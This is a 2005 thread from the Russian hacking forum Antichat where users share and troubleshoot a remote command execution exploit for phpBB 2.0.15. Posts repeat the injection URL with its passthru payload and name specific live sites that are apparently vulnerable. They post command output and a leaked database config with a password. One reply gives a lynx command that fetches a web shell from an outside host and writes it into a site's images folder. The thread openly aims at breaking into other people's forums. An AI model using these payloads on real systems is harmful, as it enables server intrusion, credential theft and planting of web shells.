Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Эксплоит для phpbb 2.0.15 (https://forum.antichat.xyz/showthread.php?t=7529)

KLez 30.06.2005 17:30

Эксплоит для phpbb 2.0.15
 
Вот вам сплоит . Ждите видео
http://target/forum/viewtopic.php?t=243&cmd=ls&highlight='.passthru($H TTP_GET_VARS[cmd]).'

m0nzt3r 30.06.2005 23:39

нифига себе щас попробуем!))

m0nzt3r 30.06.2005 23:48

чето не работает сплойт((

KLez 01.07.2005 11:39

Сам ты не работаешь все пашет бери после viewtopic.php?t=243

-artik- 01.07.2005 12:34

а у меня вот что отвечает - "Темы, которую вы запросили, не существует"....
В чем моя ошибка?

coyl 01.07.2005 13:45

надо с запросе подставить t=номер существующей темы

KLez 01.07.2005 14:01

а вы что делайте разви почле него не сушествуюший темы не надо тыкать НАРОД сначала зайдите на тему . Бага на других версия не пашет я вчера проверил=((

Manoz 01.07.2005 14:23

Не работает... Вот к примеру: http://webportal.kpiservice.com.ua/f...topic.php?t=45

KLez 01.07.2005 15:10

ХЗ братцы у меня тоже не на всех пашет сплоит

Xalegi 01.07.2005 17:32

всё нормально работает, тока вот искать нужно бажный форум.. берёте и любой форум.. открываете топ, где ОДНО СООБЩЕНИЕ (тогда будет всего ОДНО повторение выполненяемой команды...) и вставляем после номера виевтопика:
&highlight='.passthru($HTTP_GET_VARS[cmd]).'&cmd=id

и работаем =))) кстати через поиск в яндексе есть несколько форумов бажных =)) исчите =)) (ЗЫ: всего-то там 4 страницы)...

кстати.. 70% в 15-ой верссии внизу где powered номер версии форума не указывается.. а пишется 2002-2005 =)) нада искать =)

vorishka 01.07.2005 20:16

Ну вот сломал. И что дальше. config.php украл. толку от него маловато... Подскажите... Как может хэш админа или БД скомуниздить?

m0nzt3r 01.07.2005 23:55

а залить ремвиев не можешь??КЛез нееее я работаю)))

dinar_007 02.07.2005 01:09

http://www.tavernaclub.com/viewtopic.php?t=54218
ВОТ ТУТ ПРОКАТЫВАЕТ )))

tester2005 02.07.2005 01:22

Сплойт на Python,
http://www.security.nnov.ru/files/phpbbex.py

vorishka 02.07.2005 14:59

Ну а как его заливать? Какие нада права у папки? Я не нашел rwx-rwx-rwx.... Или может ещё какие нада права, что б выполнялся скрипт и я мог его залить... А то ничерта не могу...

temon 02.07.2005 20:26

помогите пожалуйчста, вот я вставил как надо, прокатило вроде, мне выдался списовк файлов и больше ничего, конфига нету, паролей к базе данных всмысле.

vorishka 02.07.2005 21:45

temon ты эта: config.php открой посмотри в HTML коде =))) Прокатит...
Повторяю свой вопрс: Какие нада права у папки? Я не нашел rwx-rwx-rwx.... Или может ещё какие нада права, что б выполнялся скрипт и я мог его залить... А то ничерта не могу...

m0nzt3r 02.07.2005 23:20

про права я не помню эти буковки))попробуй в images или tmp, да и вобще дай ссылку....динар по этой ссылке говорит что нету такой темы..

k00mar.bzz[SnK] 03.07.2005 01:34

Прописал я сплойт и сообщение которое было в это теме пменялось на:
Цитата:

pan style="font-weight: bold"a href="http://www.ww2.ru" target="_blank" class="postlink"/a/spana href="http://www.ww2.ru" target="_blank"/aspan style="font-weight: bold"/spana href="http://www.ww2.ru/category.php?id=12" target="_blank" class="postlink"/aa href="http://www.ww2.ru/category.php?id=26" target="_blank" class="postlink"/aa href="http://www.ww2.ru/category.php?id=11" target="_blank" class="postlink"/aa href="http://www.ww2.ru/category.php?id=13" target="_blank" class="postlink"/aa href="http://www.ww2.ru/category.php?id=34" target="_blank" class="postlink"/aspan style="font-weight: bold"a href="http://www.ww2.ru" target="_blank" class="postlink"/a/spa
больше не чего не произошло :(
Мож я что делаю не так ?

bul666 03.07.2005 02:11

Плчему никто видео не снимет?

dinar_007 03.07.2005 02:14

Цитата:

Сообщение от m0nzt3r
про права я не помню эти буковки))попробуй в images или tmp, да и вобще дай ссылку....динар по этой ссылке говорит что нету такой темы..

Попробуй другой топик открыть

dinar_007 03.07.2005 02:37

На некоторых форумах выдаётся вот такая штука!!!
Fatal error: Call to undefined function phpbb_rtrim() in /pub/home/motorolk/motor/forum/viewtopic.php on line 498

Чё это такое?

dinar_007 03.07.2005 03:09

http://soft.blend.ru/forum/viewtopic.php?t=123&cmd=ls&highlight='.passthru($H TTP_GET_VARS[cmd]).'

А чё дальше то делать?

Как шелл залить в форум ??? :confused:

tester2005 03.07.2005 04:43

Цитата:

Сообщение от dinar_007
http://soft.blend.ru/forum/viewtopic.php?t=123&cmd=ls&highlight='.passthru($H TTP_GET_VARS[cmd]).'

А чё дальше то делать?

Как шелл залить в форум ??? :confused:

$dbms = 'mysql';

$dbhost = 'localhost';
$dbname = 'blend129_form';
$dbuser = 'blend129_form';
$dbpasswd = '109033';

S1on 03.07.2005 05:02

Подскажите плиз, как спомощью вот этого (http://target/forum/viewtopic.php?t=536&cmd=ls&highlight='.passthru($H TTP_GET_VARS[cmd]).')
можно залить файлы на сервак ?

Rebz 03.07.2005 12:31

Ну есть масса способов..
можешь через exec() залить..
но проще узнать сначала БД (в файле конфига). Может логин и пасс и для фтп подойдут).

S1on 03.07.2005 13:40

Rebz, приведи для начинающих пример этой команды плизз

Rebz 03.07.2005 14:29

Я немного не в ту степь пошёл.. =)
Попробуй wget-ом.. если он не поддерживается, то можно lynx-ом.
Синаксис такой:

lynx -source http://здесь_урл_шелла/shell.php>>1.php
после знака >> мы вводим название, которое будет на сайте служить вам шеллом. Также можно сразу указать др.путь, например, .... >>./images/1.php (ваш шелл будет записан в папку images).
Ну и т.д. по аналогии...

temon 03.07.2005 17:53

Цитата:

Сообщение от vorishka
temon ты эта: config.php открой посмотри в HTML коде =))) Прокатит...
Повторяю свой вопрс: Какие нада права у папки? Я не нашел rwx-rwx-rwx.... Или может ещё какие нада права, что б выполнялся скрипт и я мог его залить... А то ничерта не могу...

как его открыть подробнее пожалуйста напиши.

-artik- 04.07.2005 07:33

Я тут новенький. У меня возникли вопросы что делать после того как я узнал пароль
к БД? и еще - эта уязвимость только к phpbb 2.0.15? (к прешедствующим версиям не идет?)

SK | Heaton 04.07.2005 09:43

www.[target].ru/viewtopic.php?t=4&cmd=ls&highlight='.passthru($HTT P_GET_VARS[cmd]).'&cmd=id
выдает:

uid=101(apache) gid=500(apache) groups=500(apache) uid=101(apache) gid=500(apache) groups=500(apache) uid=101(apache) gid=500(apache) groups=500(apache) uid=101(apache) gid=500(apache) groups=500(apache) uid=101(apache) gid=500что

дальше делать подскажите, Плизз

SanyaX 04.07.2005 09:59

Команды Unix выучи потом поймешь =))).

SanyaX 04.07.2005 10:02

Я даже видео снял вот что то его не публикуют =((((.

GreenBear 04.07.2005 11:30

и правильно что не публикуют, Кез, молодец -)) не нужно там пол инета хакнутого... пройдет время и можно буит =)

SanyaX 04.07.2005 11:58

Ну в чём то ты прав а в чём то нет. Пусть другой форум ставят о не этот с уязвимостью.

SK | Heaton 04.07.2005 12:52

SanyaX, скинь на webfile.ru потом даш мне код =)) :D

SanyaX 04.07.2005 13:32

На главной странице где коментарии там есть ссылка на експлойт с расширением php.

SK | Heaton 04.07.2005 14:24

SanyaX, я имел виду видео который ты снял...

SanyaX 04.07.2005 14:35

не знаю как отрагирует администрация от этого.

SK | Heaton 04.07.2005 15:31

SanyaX, у тя типа получилось =))


Время: 16:34